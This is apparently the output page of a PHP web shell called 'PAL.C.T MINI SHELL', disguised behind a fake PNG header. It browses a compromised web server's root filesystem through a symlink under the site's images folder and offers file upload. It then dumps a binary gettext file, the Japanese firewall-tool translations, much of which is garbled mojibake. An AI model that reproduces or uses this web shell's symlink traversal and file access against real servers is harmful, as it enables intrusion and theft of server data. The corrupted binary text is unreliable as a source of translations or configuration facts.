‰php  IHDRwQ)Bæa pHYs  šœsRGB®ÎégAMA± üaÔIDATxíÜMk\UÇás&uo,ÖmÄD )XwîŒ+Çe?‰ºtw.“oàWpå§;—³°QHZnw¢`gaiJ’9Þˆ‰ÑÒ̟灙ûŸýÍaî=·nlŽ[ ÊšG܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îúž·y H†¯@E7j­Í 1j+OF¥–€‹Rg}Ü«‘;@’E™Öa¹±ùáÓ~ ÿj`Ùuû'ož> ÙjÝ-$˜_§q?ŸqžSXzG'åóay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ja/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ja/LC_MESSAGES/system-config-firewall.mo

Þ•O”
Á$.6e1³Ó
òý1D
WeH}/ÆXöO[gnw	’œŠ£ÏJ¶ Ñ 	Õ 
ß [í çI!1"L"5[")‘")»"å"ú"
#?#N#-S##
ˆ#y–#$ $)$>9$x$s$ó$ù$%9)%c%<~%9»%õ%6&E&
V&d&q&	ƒ&&‘&š&Š&®&!œ&ß&÷&ÿ&('*9'd''œ'7­'å'÷'(
(("(2(L(\(Ùv(ÏP) *(*.*5*À9*ú*+#+6+&J+q+v+|+…+Ž+¥+Ä+â+ñ+,	,",Ñ*,ü,È-Ý-lü.„i/î/0	0
0)050;0iT0mŸ0V,1Eƒ1É2
Ð2Û2	ò2ü2
3/$3T4h4{4€4š4¹4Ÿ4Ú4ë4<÷4K45€5&6A76y6à†6g7
w7…7š7Ÿ7œ7Û7Þ7ï7þ788Q382…8*ž8ã8·ë8£9¯9Ÿ9Ð9€ë9@:/Ñ:8;S:;LŽ;EÛ;G!<Oi<K¹<V=I\=$Š=Ë=Ð=ã=ó=%>
+>9>-?>;m>B©>|ì>i?r?
Ž?œ?	«?µ?º?Á?×?à?ç?@@@-@9A@{@˜@œ@¢@¯@È@Ø@¶å@ޜA=QBC¢C™©C
CDQDXD`DJqDŒDÓDàD
ôD¿EÂEÏEêEþE8FMFRF^FcF©iF¥G×¹GڑHlI¯†JÇ6KþKýMÿM-NKNeN%~Np€N$O8:OCsOY·ObP‚tPa÷P5YQdQaôQXVR¢¯RŒRS‘ßT•qU¡V°©VcZWFŸYOZ
UZ
cZnZovZæZùZ
["[‰2[¡Œ[^\k\‰|\]Z]r]‰]˜] ³]
Ô]ß] ç]^^B^iV^À^Þ^å^ë^ñ^ú^_
_f*_‘_©_Å_Û_ô_Ïú_Ê`Ù`4ì`?!a1aa“a°aÇaÚa“õa¿‰b¥Ic²ïcL¢eLïe6<fQsf*Åf6ðf'g1?g
qg
g
g›g¬g^ÌgH+h‰thþh
iii&i	AiKi*Rih}j.ækmm!5m–Wmvîm3eo™oK­o<ùoB6p+yp¥p¬pZÂpq.$qSqZq÷tqlr	‚rŒry©r#s™0s	ÊsÔsðsVtftQyt`Ët-,u5Zuu§u·u!Íuïuvvvv1v$Qvvv•v*œvCÇvTw3`w*”w*¿w^êwIx`xwx~x”x*›x*Æx*ñx<y=Yy-—zÅ{	Ì{Ö{é{0í{$}$C}$h}-}8»}ô}
~~~!8~'Z~6‚~$¹~%Þ~',F
M$X€ }€Þž®}ƒ­,„8ڄ…(…7…G…X…1^…}…º†‡É†Q‡h‰o‰‚‰¡‰?º‰ú‰ÇŠ܋ò‹Œ'
Œ02Œ	cŒ%mŒ$“ŒžŒNɌÛ˜NtŽrÎ6ŒR!ߐ!‘ #‘D‘0I‘*z‘	¥‘¯‘	Œ‘Ƒߑ*⑚
’Cš’Bì’/“B7“z””¡”*º”áå”`Ǖ`(–T‰–‡Þ–‡f—`î—xO˜{ȘiD™…®™T4šT‰š	ޚèš!›'›HC›Œ›
Š›1±›Xã›Q<œŽœ6/f™ª±žΝ۝!ë
žž'-žUžJhž%³žٞݞãž*üž'ŸCŸVŸb e¡}£“£äš£€•€¢€¯€sÀ07¥h¥‡¥%£¥É¥ÑŠ-튧"+§gN§¶§»§Ó§ا%ܧ%©f(ª[«€ë¬®*¥¯ˆа_Y²*¹³Bä³*'Ž*RŽK}Ž¯ÉŽ?yµO¹µs	¶}¶Š·ž²·‘kžEýž¿C¹­ºÆ±º(x»Q¡ŒåóŸÙ¿êÀÂcÃuuŖëÅ‚ÆÆ¢ÆÆ²Æ%yÇŸÇ	žÇZÂÇÐÈîÈþÉÊà*ÊËiˆËŸË¬ËÂË
ÞËéË4ðË%Ì;ÌYḂœÌ$Í
BÍMÍ
^ÍlÍ
€Í1‹ÍœÍfÄÍ&+ÎRÎoÎ1ŠÎŒÎdÉÎ.Ð4GÐL|ÐWÉÐ@!Ñ6bÑ™Ñ~°Ñ!/ÓÛQÓû-Ô)ÕÉIåŸ4–T¡IDäŠýû-¶R@
DóY‹²`¢¹'܄”þ™­zAÞëH}
G€[̯†J‰35*V×G€	?6Ô§m>‚1•>WZ8/Öʝñlúuˆ~
bUq2Âÿネ?®.9#;4%6èhBMôµ7QÎd;SàŒ%ž^œÚâPÓÏ
Çõp:r)Ë!Xœð»$ï	N/…c©öî£ÒgiFxÐáe2ž,9=_÷·o(Õ Ñ('ØLì=kŒ“¬tÍêøÝÃÀ#ÄaÛ|E<,y—K)8ò"A7CÈN \C1˜Š›Á<BvÙO"«]Æ:³¿ªHùæ$+Kwj50’E Ånß*F&{sL‡0°3šŽ.±&éšfOJMº‘í-+¥üŸ@çŽ!
ERROR - You must be root to run %s.%(option)s option requires %(count)s arguments%s is not a valid protocol.%s is not a valid range (start port >= end port).%s option does not take a value%s option requires an argument(modified)<b>Basic Firewall Settings</b><b>Configuration</b><b>Destination</b><b>Information</b><b>Source</b><b>User Skill Level</b><b>Your current configuration is empty, all traffic will be blocked.</b><big><b>Firewall Configuration Wizard</b></big><i>Save on stop</i> and <i>Save on restart</i> additionally save rule and chain counter.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>A <i>"System without network access"</i> does not need a firewall at all. This selection disables the firewall. Otherwise, choose <i>"System with network access"</i>.A firewall allows other computers to access selected services on your computer and helps to prevent unauthorized access beyond these selections. Select the services to which the firewall should allow access.A firewall protects against unauthorized network intrusions. Enabling a firewall blocks all incoming connections. Disabling a firewall allows all connections and is not recommended. AddAdd EntryAdd InterfaceAdd additional ports or port ranges, which need to be accessible for all hosts or networks.Add entries to forward ports either from one port to another on the local system or from the local system to another system. Forwarding to another system is only useful if the interface is masqueraded. Port forwarding is IPv4 only.Address '%s' is not valid.All %s devicesAllow access to necessary ports or port ranges, only.Allow access to necessary services, only.Allow all traffic on the specified deviceAmanda Backup ClientApplyApply changesAuthentication is required to read and modify firewall settingsBackBackwards compatibility, aliased to --enabledBaculaBacula ClientBacula is a network backup solution. Enable this option, if you plan to provide Bacula backup, file and storage services.Be more verboseBeginnerBeginner
ExpertBlock this ICMP type. The default is to accept all ICMP types.CancelClicking the 'Yes' button will override any existing firewall configuration. Are you sure that you want to do this?CloseConfiguration failedConfigure SELinux mode: %sConfigure SELinux type: Usually targeted or strict PolicyConfigure Service SettingsConfigure firewall but do not activate the new configurationConfigure firewall helper modules for connection trackingConfigure firewall rulesConfigure the iptables and ip6tables service settings.Conntrack HelperConverting %sCustom RulesCustom Rules FileCustomizeDNSDefault:DescriptionDesktopDesktop
ServerDestination (at least one needed)Destination UnreachableDisableDisable FirewallDisable Internet Printing Protocol (IPP)Disable Internet Protocol Security (IPsec)Disable Multicast DNS (mDNS)Disable an iptables moduleDisable firewallERROR: FirewallD is active, please use firewall-config.Echo Reply (pong)Echo Request (ping)EditEdit EntryEnableEnable FirewallEnable an iptables moduleEnable firewallEnable firewall (default)Enable this option if you want to allow remote virtual machine management with SASL authentication and encryption (digest-md5 passwords or GSSAPI/Kerberos). The libvirtd service is needed for this option to be useful.Enable this option if you want to allow remote virtual machine management with TLS encryption, x509 certificates and optional SASL authentication. The libvirtd service is needed for this option to be useful.EnabledErrorExpertFTPFTP is a protocol used for remote file transfer. If you plan to make your FTP server publicly available, enable this option. You need the vsftpd package installed for this option to be useful.Failed to remove %s.Failed to start %s.Failed to stop %s.Failed to write %s.Failed to write selinux configuration.FileFile:FilenameFirewallFirewall ConfigurationFirewall Configuration StartupFirewall Configuration WizardFirewall TableFirewall Table:Firewall authorizationFirewall:ForwardForward the port with protocol for the interface to either another local destination port (no destination address given) or to an other destination address with an optional destination port. This is IPv4 only.Forward to another portHTTP is the protocol used to serve Web pages. If you plan to make your Web server publicly available, enable this option. This option is not required for viewing pages locally or developing Web pages.HTTPS is a modified HTTP used to serve Web pages when security is important. Examples are sites that require logins like stores or web mail. This option is not required for viewing pages locally or developing Web pages. You need the httpd package installed for this option to be useful.Here you can define which services are trusted. Trusted services are accessible from all hosts and networks.Hit <i>OK</i> to apply your changes. You do not need to restart the firewall, the changes are effective as soon as they are applied.Hit enter to continue.ICMP FilterICMP TypeIMAP over SSLIP address:IPsecIPv6 has no nat support.If you clear the <i>keep configuration</i> button, the actual firewall configuration will be overwritten.If you enable local forwarding, you have to specify a port. This port has to be different to the source port.If you enable masquerading, IP forwarding will also be enabled for your IPv4 networks.If you need further firewall settings, please modify your configuration by hand, but keep in mind, that this tool is not able to load your custom configuration. If you are using this tool, all your manual changes will be lost. If you do not want to lose your manual configuration changes, leave this program without applying.IgnoreIgnore AllIgnore actual settingsInterfaceInterface '%s' is not valid.Interface:Internet Protocol Security (IPsec) incorporates security for network transmissions directly into the Internet Protocol (IP). IPsec provides methods for both encrypting data and authentication for the host or network it sends to. If you plan to use a vpnc server or FreeS/WAN, do not disable this option.Invalid argument %sKeep ConfigurationKey:List predefined services.List the supported icmp types.LoadLoad _Default ConfigurationLocal forwardingMail (SMTP)Make sure to open the destination port on the remote system.Mark all interfaces as trusted which should have full access to the system.Mark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.Mark the interfaces to be masqueraded.Masquerades traffic from the specified device. This is IPv4 only.MasqueradingMasquerading allows you to set up a host or router that connects your local network to the internet. Your local network will not be visible and the hosts appear as a single address on the internet. Masquerading is IPv4 only.Move Entry DownMove Entry UpMulticast DNS (mDNS)NFS4Network Printing Client (IPP)Network Printing Server (IPP)NoNo configurationNot configuredNumeric status outputOKOld firewall configuration.Only mark interfaces if you can trust all participants on that network interface.Open specific ports in the firewall (e.g, ssh:tcp)Open the firewall for a service (e.g, ssh)OpenVPNOpenVPN is a virtual private network (VPN) solution. It is used to create encrypted point-to-point tunnels between computers. If you plan to provide a VPN service, enable this option.Other PortsPOP-3 over SSLParameter ProblemParse error in config filePlease answer the questions in the following configuration steps. The wizard leads you back to the main application and hides all unnecessary configuration options.Please check your firewall settings after applying custom rules.Please enter a port or port range and protocol.Please enter a valid port number, service name or range.Please load a default configuration from the <i>Options</i> menu or use the wizard.Please remember to check if the services iptables and ip6tables are enabled.Please remember to check your firewall configuration before using it.Please select an entry from the list or enter a interface further down.Please select an entry from the list or enter a port and protocol further down.Please select keep configuration or choose to load a default configuration.Please select the protocol type, the firewall table and the file containing the rules.Please select the source and destination options according to your needs.Please specify your firewall skills.PortPort / Port Range:Port ForwardingPort and ProtocolPort or port range '%s' is not valid.Port/ProtocolPort:Predefined Services with Default Environment:Print a counter/number for every rule in the status output.Print addresses and ports in numeric format for the status output.Print information about the number of packets and bytes plus the <i>input-</i> and <i>outputdevice</i> in the status output.ProtocolProtocol '%s' is not valid.Protocol TypeProtocol Type:Protocol:QuitRADIUSRed Hat Cluster SuiteRedirectReloadReload current configurationRemoveRemove EntryRouter AdvertisementRouter SolicitationRun noninteractively; process only command-line argumentsSELinux Options (deprecated)SSHSambaSamba ClientSave and restore counterSave on restartSave on stopSave the active firewall configuration with all changes since the last start before restarting the firewall. Only do this if you need to preserve the active state for the next start.Save the active firewall configuration with all changes since the last start before stopping the firewall. Only do this if you need to preserve the active state for the next start.Secure Shell (SSH) is a protocol for logging into and executing commands on remote machines. It provides secure encrypted communications. If you plan on accessing your machine remotely via SSH over a firewalled interface, enable this option. You need the openssh-server package installed for this option to be useful.Secure WWW (HTTPS)SelectSelect <i>"Expert"</i> if you are familiar with firewall configurations or if you need to add user customized rules. Otherwise, choose <i>"Beginner"</i>.Select a FileServerServiceService SettingsSet firewall default type: %s. This overwrites any existing configuration.Show this help messageShow versionSource (all needed)Source QuenchSpecify a custom rules file for inclusion in the firewall, after the default rules. Default protocol type: ipv4, default table: filter. (Example: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Start WizardStart configuration wizardStatus line numbersSupported icmp types:System without network access
System with network accessTFTPTFTP ClientTODOTableThe Amanda backup client option allows you to connect to a Amanda backup and archiving server. You need the amanda-client package installed for this option to be useful.The Domain Name System (DNS) is used to provide and request host and domain names. Enable this option, if you plan to provide a domain name service (e.g. with bind).The Internet Message Access Protocol over SSL (IMAPs) allows a local client to access email on a remote server in a secure way. If you plan to provide a IMAP over SSL service (e.g. with dovecot), enable this option.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over tcp) provides the ability to share printers over the network. Enable this option if you plan to share printers via cups over the network.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over udp) provides the ability to get information about a printer (e.g. capability and status) and to control printer jobs. If you plan to use a remote network printer via cups, do not disable this option.The NFS4 protocol is used to share files via TCP networking. You will need to have the NFS tools installed and properly configure your NFS server for this option to be useful.The Post Office Protocol version 3 (POP3) is a protocol to retrieve email from a remote server over a TCP/IP connection. Enable this option, if you plan to provide a POP3 service (e.g. with dovecot).The Remote Authentication Dial In User Service (RADIUS) is a protocol for user authentication over networks. It is mostly used for modem, DSL or wireless user authentication. If you plan to provide a RADIUS service (e.g. with freeradius), enable this option.The Trivial File Transfer Protocol (TFTP) is a protocol used to transfer files to and from a remote machine in s simple way. It is normally used only for booting diskless workstations and also to transfer data in the Preboot eXecution Environment (PXE).The file '%s' does not exist.The firewall configuration is not consistent.The firewall is disabled.The firewall is enabled.The firewall table '%s' is not valid.The following files are missing or unusable:
	%s

Apply your firewall configuration now to correct this problem.The protocol type '%s' is not valid.There are unapplied changes, do you really want to quit?This error message informs a host to send packets on another route.This error message is generated by a host or gateway if the destination is not reachable.This error message is generated if the IP header is bad, either by a missing option or bad length.This error message is generated if the time-to-live was exceeded either of a packet or of the reassembling of a fragmented packet.This error message is generated to tell a host to reduce the pace at which it is sending packets.This message is the answer to an <i>Echo Request</i>.This message is used by a host attached to a multicast link to request a <i>Router Advertisement</i>This message is used by routers to periodically announce the IP address of a multicast interface.This message is used to test if a host is reachable mostly with the <i>ping</i> utility.This option allows a Bacula server to connect to the local machine to schedule backups. You need the bacula-client package installed for this option to be useful.This option allows incoming SMTP mail delivery. If you need to allow remote hosts to connect directly to your machine to deliver mail, enable this option. You do not need to enable this if you collect your mail from your ISP's server by POP3 or IMAP, or if you use a tool such as fetchmail. Note that an improperly configured SMTP server can allow remote machines to use your server to send spam.This option allows you to access Trivial File Transfer Protocol (TFTP) servers. You need the tftp package installed for this option to be useful.This option allows you to access Windows file and printer sharing networks. You need the samba-client package installed for this option to be useful.This option allows you to access and participate in Windows file and printer sharing networks. You need the samba package installed for this option to be useful.This option allows you to use the Red Hat Cluster Suite. Ports are opened for openais, ricci and dlm. You need the Red Hat Cluster Suite installed for this option to be useful.This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.This program will help you to set up a basic firewall for your system.This wizard helps you to set up a clean firewall configuration for your system.Time ExceededTo AddressTo PortTo ensure a sane state, the kernel firewall modules must be unloaded when the firewall is restarted or stopped.Trusted InterfacesTrusted ServicesTypeUnload modules on restart and stopUpdate firewall non-interactively if the firewall is enabled. This will also restart the firewall. The -n and -f options will be ignored.Use custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.User DefinedUser Skill LevelUsing these options with no additional firewall options will not create or alter firewall configuration, only SELinux will be configured.Valid values: %sValid values: <port>[-<port>], where port is either a number [0..65535] or a service name.Valid values: tcp, udpVerbose statusVirtual Machine ManagementVirtual Machine Management (TLS)WWW (HTTP)WarningWhat kind of system do you have?WizardYesYou can change the settings in the <i>Options</i> menu afterwards.Your firewall configuration was converted from an old version. Please verify the configuration and apply.[<type>:][<table>:]<filename>_About_File_Help_Options_Quit_Start Configuration Wizardconfigurationif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]invalid interface '%s'.invalid port definition %s.invalid service '%s'.ipv6 has no nat support.localmDNS provides the ability to use DNS programming interfaces, packet formats and operating semantics in a small network without a conventional DNS server. If you plan to use Avahi, do not disable this option.modified labelno such option: %soption %(option)s: invalid forward_port '%(value)s'.option %(option)s: invalid forward_port '%(value)s': %(error)s.option %(option)s: invalid icmp type '%(value)s'.port range %s is not unique.system-config-firewalltranslator-creditsyesFirewall ConfigurationyesMark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.yesThe Internet Control Message Protocol (ICMP) is mainly used to send error messages between networked computers, but additionally for informational messages like ping requests and replies.yesUse custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.Project-Id-Version: system-config-firewall
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2011-02-16 16:32+0200
PO-Revision-Date: 2013-11-20 09:28+0000
Last-Translator: Hajime Taira <htaira@redhat.com>
Language-Team: Japanese (http://www.transifex.com/projects/p/system-config-firewall/language/ja/)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: ja
Plural-Forms: nplurals=1; plural=0;

゚ラヌ - %s は root ナヌザヌで実行する必芁がありたす。%(option)s オプションには %(count)s の匕数が必芁ずなりたす%s は正しいプロトコルではありたせん。%s は正しい範囲ではありたせん (開始ポヌト >=  終了ポヌト).%s オプションは倀を取りたせん%s オプションには、匕数が぀必芁です(倉曎されたした)<b>基本的なファむアりォヌル蚭定</b><b>蚭定</b><b>宛先</b><b>情報</b><b>送り元</b><b>ナヌザヌの熟緎床</b><b>珟圚の蚭定はなく、すべおのトラフィックはブロックされたす。</b><big><b>ファむアりォヌル蚭定の操䜜ガむド機胜</b></big><i>停止時に保存</i> ず <i>リスタヌト時に保存</i> は远加でルヌルずチェヌンカりンタヌを保存したす。<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type><i>"ネットワヌクアクセスのないシステム"</i>ではファむアりォヌルは完党に䞍芁です。これを遞択するずファむアりォヌルを無効にしたす。そうでなければ<i>ネットワヌクアクセスのあるシステム</i>を遞択しおください。ファむアりォヌルは、ご䜿甚のコンピュヌタヌ䞊の指定したサヌビスに他のコンピュヌタヌがアクセスするこずを蚱可し、蚱可されおいないコンピュヌタヌからのアクセスを防ぐこずができたす。ファむアりォヌルにおアクセスを蚱可するサヌビスを遞択しお䞋さい。ファむアりォヌルは蚱可されおいないネットワヌクからの䟵入を防埡したす。 ファむアりォヌルを有効にするずすべおの受信を遮断したす。 ファむアりォヌルを無効にするずすべおの接続が蚱可されるため掚奚できたせん。远加゚ントリヌの远加むンタヌフェヌスの远加すべおのホストやネットワヌクからアクセスできるこずが必芁な远加のポヌトか、ポヌトの範囲を远加したす。ロヌカルシステムの指定ポヌトから違うポヌトぞ、もしくはロヌカルシステムから他のシステムぞのフォワヌド゚ントリヌの远加。なお、他のシステムぞのフォワヌドはそのむンタヌフェむスがIPマスカレヌドされおいる時のみ有効です。ポヌトフォワヌドは IPv4 のみ有効です。アドレス '%s' は有効ではありたせん。党 %s デバむス必芁なポヌトやポヌト範囲ぞのみアクセスを蚱可する。必芁なサヌビスぞのアクセスのみ蚱可する。指定のデバむス䞊ですべおのトラフィックを蚱可Amanda バックアップクラむアント適甚倉曎を適甚するファむアりォヌルの蚭定の読み蟌みず修正には、認蚌が必芁です。戻る䞋䜍互換、--enabled ぞの゚むリアスBaculaBacula クラむアントBacula はネットワヌクバックアップ甚の゜リュヌションです。Bacula バックアップず ファむル及びストレヌゞのサヌビスを提䟛する蚈画があればこのオプションを有効に しおください。詳しく衚瀺する初心者初心者
゚キスパヌトこの ICMP タむプをブロックしたす。デフォルトでは、すべおの ICMP タむプを 蚱可したす。取り消し[はい]のボタンをクリックするず、既存のファむアりォヌル蚭定を䞊曞きしたす。本圓にこの操䜜をしたいですか?閉じる蚭定は倱敗したしたSELinux モヌドの蚭定: %sSELinux のタむプを蚭定したす: 通垞は 'targeted' か 'strict' ポリシヌサヌビス蚭定ファむアりォヌルを蚭定するが、新しい蚭定を䜜動させない接続の远跡のため、ファむアりォヌルヘルパヌモゞュヌルを蚭定する。ファむアりォヌルのルヌルの蚭定iptables ず ip6tables サヌビスを蚭定する。conntrack ヘルパヌ%s を倉換䞭カスタムルヌルカスタムルヌルファむルカスタマむズDNSデフォルト:説明デスクトップデスクトップ
サヌバヌ宛先 (少なくずも 1 ぀必芁)宛先に到達できたせん無効ファむアりォヌルを無効にするむンタヌネット印刷プロトコル (IPP) を無効にするむンタヌネットプロトコルセキュリティヌ (IPsec) を無効にするマルチキャスト DNS (mDNS) を無効にするiptables モゞュヌルを無効にするファむアりォヌルを無効にする゚ラヌ: FirewallD がアクティブです。firewall-config を利甚しおください。゚コヌ応答 (pong)゚コヌ芁求 (ping)線集線集゚ントリヌ有効ファむアりォヌルを有効にするiptables モゞュヌルを有効にするファむアりォヌルを有効にするファむアりォヌルを有効にする (デフォルト)SASL の認蚌ず暗号化 (digest-md5 パスワヌドたたは GSSAPI/Kerberos) を䜿甚したリモヌトによる仮想マシンの管理を行えるようにしたい堎合にこのオプションを有効にしたす。 このオプションを䜿甚するには libvirtd サヌビスが必芁になりたす。TLS 暗号化、 x509 蚌明曞、 オプションで SASL 認蚌を䜿甚したリモヌトによる仮想マシンの管理を行えるようにしたい堎合にこのオプションを有効にしたす。 このオプションを䜿甚するには libvirtd サヌビスが必芁になりたす。有効゚ラヌ゚キスパヌトFTPFTP はリモヌトファむル転送に䜿甚されるプロトコルです。FTP サヌバヌを公開する予定の堎合はこのオプションを有効にしたす。このオプションが圹に立぀ようにするには vsftpd パッケヌゞをむンストヌルする必芁がありたす。%s の削陀に倱敗したした。%s の起動に倱敗したした。%s の停止に倱敗したした。%s ぞの曞き蟌みに倱敗したした。selinux 蚭定ぞの曞き蟌みに倱敗したした。ファむルファむル:ファむル名ファむアりォヌルファむアりォヌルの蚭定ファむアりォヌル蚭定の開始ファむアりォヌル蚭定の操䜜ガむド機胜ファむアりォヌルテヌブルファむアりォヌルテヌブル:ファむアりォヌルの暩限授䞎ファむアりォヌル:転送そのむンタヌフェむスのためのポヌトずプロトコルを他のロヌカルポヌト(宛先アドレス指定なし)か、他の宛先アドレスにオプションの宛先ポヌト付きぞフォワヌドする。これは IPv4 のみ有効です。他のポヌトぞのフォワヌドHTTP は Web ペヌゞを提䟛するためのプロトコルです。Web ペヌゞを公開する予定がある堎合はこのオプションを有効にしたす。ペヌゞをロヌカルで衚瀺したり、Web ペヌゞの開発にはこのオプションは必芁ありたせん。HTTPS はセキュリティヌが重芁な堎合に Web ペヌゞを䟛絊するために甚いられる修正された HTTP です。䟋は店舗やりェブメヌルのようなログむンを必芁ずするサむトです。このオプションはロヌカルのペヌゞを芋たり Web ペヌゞの開発には必芁ありたせん。このオプションが圹に立぀ようにするには、httpd パッケヌゞをむンストヌルしおおく必芁がありたす。ここでどのサヌビスが信頌できるかを定矩できたす。信頌したサヌビスはすべおのホストやネットワヌクからアクセスできたす。倉曎を適甚するには <i>OK</i> を抌したす。ファむアりォヌルを再起動する必芁はなく、倉曎を適甚したら盎ちに有効になりたす。続行するにはEnterキヌを抌しおください。ICMP フィルタヌICMP タむプSSL 䞊の IMAPIP アドレス:IPsecIPv6 には NAT サポヌトがありたせん。<i>蚭定の保持</i> ボタンをクリアヌしたら、実際のファむアりォヌル蚭定は䞊曞きされたす。ロヌカルフォワヌディングを有効にするなら、ポヌトを指定しなければなりたせん。これは゜ヌスポヌトずは異ならなければなりたせん。マスカレヌディングを有効にするず、IPv4 ネットワヌクでは IP フォワヌディングも有効になりたす。ファむアりォヌルの蚭定をもっず詳现に行いたいのであれば、ファむルを手動で倉曎しおください。しかしこのツヌルであなたのカスタム蚭定を読み蟌むこずができなくなっおしたうかもしれたせん。たた、このファむアりォヌル蚭定ツヌルを䜿った堎合、手動で蚭定した内容はすべお倱われたす。手動で蚭定したカスタム蚭定を倱いたくないのならば、このプログラムを䜿甚しないでください。無芖すべおを無芖実際の蚭定を無芖するむンタヌフェむスむンタヌフェむス '%s' は有効ではありたせん。むンタヌフェむス:むンタヌネットプロトコルセキュリティヌ (IPsec) はネットワヌク転送のセキュリティヌを盎接むンタヌネットプロトコル(IP)に組み蟌みたす。IPsec はデヌタの暗号化方法ずホストやホストが送信するネットワヌクの認蚌方法を提䟛したす。vpnc サヌバヌか FreeS/WAN を䜿甚する予定があるのならば、このオプションを無効にしおはいけたせん。䞍圓な実匕数 %s蚭定の保持キヌ:定矩枈のサヌビスを衚瀺する察応しおいる icmp タむプを䞀芧衚瀺ロヌドデフォルト蚭定のロヌド(_D)ロヌカルフォワヌディングメヌル (SMTP)リモヌトシステムの宛先ポヌトを開けるこずを確認する。 すべおのむンタヌフェむスに信頌できるずいう、システムにフルアクセスできる印を぀ける。䞀芧内の拒吊されるべき ICMP タむプをマヌクしたす。他のすべおの ICMP タむプは、ファむアりォヌルの通過が蚱可されたす。デフォルトでは制限されおいたせん。マスカレヌドするようにむンタヌフェむスに印を぀ける。指定のデバむスからのトラフィックをマスカレヌドする。これは IPv4 のみ有効です。マスカレヌディングマスカレヌディングによりロヌカルネットワヌクをむンタヌネットず接続しおいるホストやルヌタヌをセットアップするこずができたす。あなたのロヌカルネットワヌクはむンタヌネットからは芋えず、むンタヌネット䞊の䞀぀のアドレスに芋えたす。マスカレヌディングは IPv4 のみ有効です。゚ントリヌを䞋ぞ動かす゚ントリヌを䞊に動かすマルチキャスト DNS (mDNS)NFS4ネットワヌク印刷クラむアント (IPP)ネットワヌク印刷サヌバヌ (IPP)いいえ蚭定なし未蚭定数字での状態出力OK叀いファむアりォヌルの蚭定。ネットワヌクむンタヌフェむス䞊の党参加者が信頌できる堎合にのみ、 むンタヌフェヌスに印を぀けおください。ファむアりォヌルで特定のポヌトを開く(䟋 ssh:tcp)ファむアりォヌルで特定のサヌビスを開く(䟋 ssh)OpenVPNOpenVPN は仮想プラむベヌトネットワヌク (VPN) の゜リュヌションです。コンピュヌタヌ間に暗号化された 2 地点間のトンネルを䜜るのに䜿甚されたす。VPN サヌビスを提䟛しようず考えおいるのならば、このオプションを有効にしおください。その他のポヌトSSL 䞊の POP-3パラメヌタヌ問題蚭定ファむルの構文解析゚ラヌ次の蚭定ステップで質問に答えおください。操䜜ガむド機胜があなたをメむンアプリケヌションに戻るように導き、セットアップに䞍芁な蚭定オプションを隠したす。カスタムルヌル適甚の埌、ファむアりォヌル蚭定を確認しおください。有効なポヌト番号たたはポヌト範囲ずプロトコルを入力しおください。有効なポヌト番号か、サヌビス名、範囲を指定しおください。省略倀の蚭定を <i>オプション</i> メニュヌからロヌドするか、操䜜ガむド機胜を䜿甚しおください。サヌビスの iptables および ip6tables が有効になっおいるか確認するのを忘れないようにしおください。ファむアりォヌル蚭定を䜿甚する前にチェックを忘れないでください。䞀芧から゚ントリヌを遞択するか、ずっず䞋方でむンタヌフェむスを入力しおください。䞀芧から゚ントリヌを遞択するか、ずっず䞋方でポヌトずプロトコルを入力しおください。蚭定の保持を遞択するか、デフォルトの蚭定をロヌドするを遞択しお䞋さい。プロトコルタむプ、 ファむアりォヌルテヌブルおよびルヌルを含むファむルを遞択しおください。必芁に応じた送り元ず宛先のオプションを遞択しおください。あなたのファむアりォヌルに関する腕前を指定しおください。ポヌトポヌト / ポヌト範囲:ポヌトフォワヌディングポヌトずプロトコルポヌトたたはポヌト範囲 '%s' は有効ではありたせん。ポヌト/プロトコルポヌト:デフォルト環境での定矩枈サヌビス:状態衚瀺ですべおのルヌルに぀いおカりンタヌ/数字を衚瀺する。状態衚瀺のためにアドレスずポヌトを数字圢匏で印刷する。パケット数ずバむト数に぀いおの情報ず、状態出力䞭の <i>入力デバむス</i> ず <i>出力デバむス</i> の衚瀺。プロトコルプロトコル '%s' は有効ではありたせん。プロトコルタむププロトコルタむプ:プロトコル:終了RADIUSRed Hat Cluster Suite経路倉曎再読み蟌み珟圚の蚭定を再読み蟌み削陀゚ントリヌの削陀ルヌタヌアドバタむズメントルヌタヌ芁請非察話的に実行; コマンドラむンの匕数のみを凊理するSELinux オプション(砎棄枈み)SSHSambaSamba クラむアントカりンタヌを保存し、埩元するリスタヌト時に保存停止時に保存ファむアりォヌルをリスタヌトする前に、最埌の開始以降のすべおの倉曎ずいっしょに珟圚のファむアりォヌル蚭定を保存したす。次の開始時に珟圚の状態を倱いたくない堎合のみこれを行いたす。ファむアりォヌルを停止する前に、最埌の開始以降のすべおの倉曎ずいっしょに珟圚のファむアりォヌル蚭定を保存したす。次の起動時に珟圚の状態を倱いたくない堎合のみこれを行いたす。セキュアシェル (SSH) はリモヌトマシンにログむンしたり、コマンドを実行したりするためのプロトコルです。暗号化した安党な通信を提䟛したす。ファむアりォヌル蚭定のあるむンタヌフェむスで SSH を通しおマシンにリモヌトアクセスする予定がある堎合は、このオプションを有効にしたす。このオプションが圹に立぀ようにするには 